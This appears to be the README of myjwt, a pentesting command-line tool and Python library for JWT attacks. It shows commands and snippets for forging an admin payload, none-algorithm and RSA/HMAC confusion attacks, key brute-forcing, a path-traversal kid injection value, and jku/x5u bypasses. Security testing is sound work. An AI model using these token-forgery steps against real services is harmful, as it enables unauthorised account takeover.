myjwt 1.1.1

Pentesting Tool for JWT(JSON Web Tokens).Modify/Crack/Check Your jwt.

MyJWT

Introduction

This cli is for pentesters, CTF players, or dev.
You can modify your jwt, sign, inject ,etc...
Check Documentation for more information.
If you see problems or enhancement send an issue.I will responds as soon as possible. Enjoy :)

Documentation

Documentation is available at http://myjwt.readthedocs.io

Table of Contents

• Features
• Installation
• Usage
• Examples
• Download
• Contribute

Features

• modify jwt (header/Payload)
• None Vulnerability
• RSA/HMAC confusion
• Sign a jwt with key
• Brute Force to guess key
• kid injection
• Jku Bypass
• X5u Bypass

Installation

To install myjwt, simply use pip:

pip install myjwt

To run mywt from a docker image, run:

docker run -v $(pwd)/wordlist:/home/app/wordlist/ -it ghcr.io/mBouamama/MyJWT myjwt

To install myjwt, on git:

git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python myjwt_cli.py --help

Usage

Examples

• Modify Your jwt
• None Vulnerabilty Check
• Sign Key
• Brute Force Signature
• RSA/HMAC Confusion
• Kid Injection
• Send your new Jwt to url
• Jku Vulnerability
• X5u Vulnerability

Modify your Jwt

CLI

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"

Code

from MyJWT.modifyJWT import addpayload, addheader, changePayload
from MyJWT.utils import jwtToJson, SIGNATURE, encodeJwt

jwtJson = jwtToJson(jwt)
jwtJson = addheader(jwtJson, {"kid": "001"})
jwtJson = changePayload(jwtJson, {"username": "admin"})
jwt = encodeJwt(jwtJson) + "." + jwtJson[SIGNATURE]

Full example here: 01-modify-jwt

None Vulnerability

CLI

myjwt YOUR_JWT --none-vulnerability

CODE

from MyJWT.utils import jwtToJson, SIGNATURE
from MyJWT.vulnerabilities import noneVulnerability
jwtJson = jwtToJson(jwt)
jwt = noneVulnerability(encodeJwt(jwtJson) + "." + jwtJson[SIGNATURE])

Full example here: 02-none-vulnerability

Sign Key

CLI

myjwt YOUR_JWT --sign YOUR_KEY

CODE

from MyJWT.modifyJWT import signature
from MyJWT.utils import jwtToJson
key = "test"
jwt = signature(jwtToJson(jwt), key)

Full example here: 03-sign-key

Brute Force

CLI

myjwt YOUR_JWT --bruteforce PATH

CODE

from MyJWT.vulnerabilities import bruteforceDict
wordlist = "../../wordlist/common_pass.txt"
key = bruteforceDict(jwt, wordlist)

Full example here: 04-brute-force

RSA/HMAC Confusion

CLI

myjwt YOUR_JWT --hmac FILE

CODE

from MyJWT.vulnerabilities import confusionRsaHmac
file = "public.pem"
jwt = confusionRsaHmac(jwt, file)

Full example here: 05-rsa-hmac-confusion

Kid Injection

CLI

myjwt YOUR_JWT --kid INJECTION

Code

from MyJWT.modifyJWT import signature
from MyJWT.utils import jwtToJson
from MyJWT.vulnerabilities import injectSqlKid

injection = "../../../../../../dev/null"
sign = ""
jwt = injectSqlKid(jwt, injection)
jwt = signature(jwtToJson(jwt), sign)

Full example here: 06-kid-injection

Send your new Jwt to url

CLI

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku Vulnerability

CLI

myjwt YOUR_JWT --jku YOUR_URL

Code

from MyJWT.vulnerabilities import jkuVulnerability
newJwt = jkuVulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 07-jku-bypass

X5U Vulnerability

CLI

myjwt YOUR_JWT --x5u YOUR_URL

Code

from MyJWT.vulnerabilities import x5uVulnerability
newJwt = x5uVulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

Full example here: 08-x5u-bypass

Download

Check github releases. Latest is available at https://github.com/mBouamama/MyJWT/releases/latest

Contribute

• Fork this repository or clone it
• Create a new branch (feature, hotfix, etc...)
• Make necessary changes and commit those changes
• Check lint with make flake8
• Check unit_test with make test
• Send Pull Request I will check as Soon as Possible.

Change log

The log's become rather long. It moved to its own file.

See CHANGES.